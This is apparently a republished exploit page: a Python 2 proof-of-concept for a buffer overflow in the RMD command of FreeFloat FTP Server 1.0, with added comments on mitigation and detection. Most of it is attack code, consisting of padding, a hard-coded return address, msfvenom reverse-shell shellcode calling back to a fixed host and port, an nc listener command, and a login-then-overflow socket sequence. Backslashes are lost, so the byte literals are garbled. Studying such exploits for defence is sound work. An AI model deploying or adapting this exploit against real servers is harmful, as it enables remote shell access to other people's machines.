Freefloat FTP Server 1.0 RMD Buffer Overflow
Posted on 02 November 2016
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Proof-of-concept listing for a buffer overflow in FreeFloat FTP Server 1.0,
# triggered via the argument of the RMD command (see the author's header
# comments below). Reviewer notes, written for defenders reading this page:
#
#   * Vulnerability class: the server copies a client-supplied command
#     argument into a fixed-size buffer without bounding its length. The
#     payload layout below (fixed padding, then a 4-byte value labelled
#     GDI32.dll, then a NOP-style sled and the payload) is the shape of a
#     saved-return-address overwrite; the exact frame layout is not shown
#     here and is inferred from that structure.
#   * The hard-coded address is a fixed module address valid only for the
#     specific build noted in "Tested on" (Windows XP SP3, Spanish, x86);
#     XP has no ASLR, which is why a static address is usable at all. On
#     platforms with ASLR/DEP the same listing would not be reliable.
#   * Mitigation on the server side is a length check on the RMD argument
#     before it is copied, plus the usual exploit mitigations (DEP, ASLR,
#     stack cookies). Detection: an FTP session that authenticates with the
#     low-privilege credentials used here and then issues a single RMD
#     whose argument is roughly 1 KB long is a strong anomaly for IDS /
#     FTP access-log review.
#   * This is Python 2 code (print statement, str used as a byte buffer).
#   * As rendered on this page the byte-string literals read as plain ASCII
#     (e.g. 'x90'), so their lengths and contents differ from what the
#     author's escape sequences denote; treat the listing as illustrative.
import socket
#Exploit Title: FreeFloat FTP Server Buffer Overflow RMD command
#Date: 29 Octubre 2016
#Exploit Author: Karri93
#Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
#Version: 1.0
#Tested on: Windows XP Profesional SP3 Spanish x86
#Shellcode Metasploit:
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b 'x00x0Ax0D' -f -c
#nc -lvp 443

# Overwritten return value; labelled by the author as an address inside
# GDI32.dll. Build-specific (see header comment on ASLR above).
ret= "x2Fx1DxF1x77" #GDI32.dll

# Payload produced by the msfvenom command quoted above (reverse shell to
# LHOST/LPORT as given there). Kept verbatim from the page.
shellcode=("xd9xc4xd9x74x24xf4x5bx33xc9xb1x52xbax9bx84x71"
"xb0x83xc3x04x31x53x13x03xc8x97x93x45x12x7fxd1"
"xa6xeax80xb6x2fx0fxb1xf6x54x44xe2xc6x1fx08x0f"
"xacx72xb8x84xc0x5axcfx2dx6exbdxfexaexc3xfdx61"
"x2dx1exd2x41x0cxd1x27x80x49x0cxc5xd0x02x5ax78"
"xc4x27x16x41x6fx7bxb6xc1x8cxccxb9xe0x03x46xe0"
"x22xa2x8bx98x6axbcxc8xa5x25x37x3ax51xb4x91x72"
"x9ax1bxdcxbax69x65x19x7cx92x10x53x7ex2fx23xa0"
"xfcxebxa6x32xa6x78x10x9ex56xacxc7x55x54x19x83"
"x31x79x9cx40x4ax85x15x67x9cx0fx6dx4cx38x4bx35"
"xedx19x31x98x12x79x9ax45xb7xf2x37x91xcax59x50"
"x56xe7x61xa0xf0x70x12x92x5fx2bxbcx9ex28xf5x3b"
"xe0x02x41xd3x1fxadxb2xfaxdbxf9xe2x94xcax81x68"
"x64xf2x57x3ex34x5cx08xffxe4x1cxf8x97xeex92x27"
"x87x11x79x40x22xe8xeaxafx1bxf3xedx47x5exf3xf0"
"x2cxd7x15x98x42xbex8ex35xfax9bx44xa7x03x36x21"
"xe7x88xb5xd6xa6x78xb3xc4x5fx89x8exb6xf6x96x24"
"xdex95x05xa3x1exd3x35x7cx49xb4x88x75x1fx28xb2"
"x2fx3dxb1x22x17x85x6ex97x96x04xe2xa3xbcx16x3a"
"x2bxf9x42x92x7ax57x3cx54xd5x19x96x0ex8axf3x7e"
"xd6xe0xc3xf8xd7x2cxb2xe4x66x99x83x1bx46x4dx04"
"x64xbaxedxebxbfx7ex1dxa6x9dxd7xb6x6fx74x6axdb"
"x8fxa3xa9xe2x13x41x52x11x0bx20x57x5dx8bxd9x25"
"xcex7exddx9axefxaa")

# 30-unit sled in front of the payload.
buffer= 'x90'*30 + shellcode

# Full RMD argument: 248 filler units up to the overwritten return value,
# the sled + payload, then trailing filler padding the total to 696 units.
# Note the padding term goes negative (and the multiplication yields an
# empty string) if the sled + payload exceed 696 units.
buffer1= 'x41' * 248 + ret + buffer + 'x43'*(696-len(buffer))

print "Sending..."

# Plain TCP to the FTP control port; the target address is hard-coded.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.1.150',21))  # socket.connect returns None; 'connect' is never read
s.recv(1024)  # banner

# Authenticate with the low-privilege account used by the author; the
# overflow is reachable only after login, so authentication logs are a
# useful correlation point for defenders.
s.send('USER free ')
s.recv(1024)
s.send('PASS free ')
s.recv(1024)

# Single oversized RMD argument delivers the overflow. No response is read
# before the socket is closed.
s.send('RMD' + buffer1 + ' ')
s.close()